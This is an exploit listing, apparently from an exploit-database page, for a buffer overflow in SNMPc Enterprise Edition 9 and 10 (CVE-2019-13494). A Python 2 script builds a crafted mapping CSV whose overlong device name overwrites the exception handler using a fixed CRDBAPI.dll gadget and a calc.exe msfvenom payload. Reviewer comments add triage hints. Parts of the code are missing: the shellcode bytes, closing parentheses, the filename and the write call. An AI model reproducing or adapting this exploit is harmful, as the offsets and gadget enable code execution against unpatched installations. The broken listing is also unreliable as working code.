SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow

Related Vulnerabilities: CVE-2019-13494  
Publish Date: 11 Jul 2019
Author: mark
# -*- coding: utf-8 -*-

# Exploit: SNMPc Enterprise Edition (9 & 10) (Mapping File Name BOF) #   
# Date: 11 July 2019                                                 #
# Exploit Author: @xerubus |                            #
# Vendor Homepage:                       #
# Software Link:          #
# Version: Enterprise Edition 9 & 10                                 #
# Tested on:  Windows 7                                              # 
# CVE-ID: CVE-2019-13494                                             #
# Full write-up:                    #
import sys, os  

        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
|   D_ ]\ \/  -= SNMPc_Mapping_BOF by @xerubus =-    
|   D _]/\ \  -= We all have something to hide =-
 \___/ / /\ \\
      (_ )( _)

# Pieces of the overlong field value that `buffer` (further down) places
# between pre_padding and post_padding.
# 2064 filler bytes; presumably the distance from the start of the field to the
# exception-handler record the next two values overwrite (confirm against the
# write-up, the offset is not derived anywhere in this listing).
junk = "A" * 2064    
# NOTE(review): `seh` is a hard-coded address inside CRDBAPI.dll. That only
# resolves as intended if the DLL loads at a fixed base and is not protected by
# SafeSEH/ASLR. Neither is shown here; confirm when assessing which
# installations are exposed.
nseh = "\xeb\x07\x90\x90"      # short jmp to 0018f58d  \xeb\x07\x90\x90
seh = "\x05\x3c\x0e\x10"       # 0x100e3c05 ; pop esi # pop edi # ret (C:\program files (x86)\snmpc network manager\CRDBAPI.dll)

# Leading part of the mapping file: the CSV column-header row followed by a
# well-formed "Root Subnet" row, which ends with the mandatory "\n".
# `buffer` (further down) appends the overlong value directly after this, so it
# lands in the first column ("Name" per the header row) of the next row.
# NOTE(review): the closing parenthesis of this tuple is missing in the listing
# as shown, probably lost in extraction.
pre_padding = ( 
"Name,Type,Address,ObjectID,Description,ID,Group1,Group2,Icon,Bitmap,Bitmap Scale,Shape/Thickness,Parent,Coordinates,Linked Nodes,Show Label,API Exec,MAC,Polling Agent,Poll Interval,Poll Timeout,Poll Retries,Status Variable,Status Value,Status Expression,Services,Status,Get Community,Set Community,Trap Community,Read Access Mode,Read/Write Access Mode,V3 NoAuth User,V3 Auth User,V3 Auth Password,V3 Priv Password"
"\"Root Subnet\",\"Subnet\",\"\",\"\",\"\",\"2\",\"000=Unknown\",\"\",\"auto.ico\",\"\",\"2\",\"Square\",\"(NULL)\",\"(0,0)\",\"N/A\",\"True\",\"auto.exe\",\"00 00 00 00 00 00\",\"\",\"30\",\"2\",\"2\",\"\",\"0\",\"0\",\"\",\"Normal-Green\",\"public\",\"netman\",\"public\",\"SNMP V1\",\"SNMP V1\",\"\",\"\",\"\",\"\"\n"

# Trailing part of the mapping file: closes the quoted first field and fills in
# the remaining columns of a "Device" row, ending with the mandatory "\n".
# Triage hint: in a file built this way the first field of the Device row is
# over 2000 bytes long and contains non-printable bytes, which a legitimate
# node name would not.
post_padding = ( 
"\",\"Device\",\"\",\"\",\"\",\"3\",\"000=Unknown\",\"000=Unknown\",\"auto.ico\",\"\",\"2\",\"Square\",\"Root Subnet(2)\",\"(-16,-64)\",\"N/A\",\"True\",\"auto.exe\",\"00 00 00 00 00 00\",\"\",\"30\",\"2\",\"2\",\"\",\"0\",\"=\",\"\",\"Normal-Green\",\"public\",\"netman\",\"public\",\"SNMP V1\",\"SNMP V1\",\"\",\"\",\"\",\"\"\n")

# Payload bytes. Per the generator comment below they only launch calc.exe,
# i.e. a benign proof that code execution was reached.
# NOTE(review): the byte string itself is absent from this listing and the
# tuple is never closed, so the script does not parse as shown.
# msfvenom —platform windows -p windows/exec cmd=calc.exe -b "\x00\x0a\x0d" -f c
shellcode = (

# Python 2 print statements: the script predates Python 3.
print "[+] Building payload.."
# Ten 0x90 bytes are placed in front of the payload.
payload = "\x90" * 10 + shellcode
print "[+] Creating buffer.."
# File content in order: header and first row, filler, the two overwritten
# handler fields, payload, ten more 0x90 bytes, then the rest of the Device row.
buffer = pre_padding + junk + nseh + seh + payload + "\x90" * 10 + post_padding
print "[+] Writing evil mapping file.."
# NOTE(review): `filename` is not defined in the visible lines and no write or
# close call appears in this listing; the message below names the output
# evilmap.csv.
textfile = open(filename , 'w')
# The overflow is only reached when a user imports the file into SNMPc, so
# mapping files from untrusted sources should not be imported into
# installations still affected by CVE-2019-13494.
print "[+] Done.  Import evilmap.csv into SNMPc and A Wild Calc Appears!\n\n"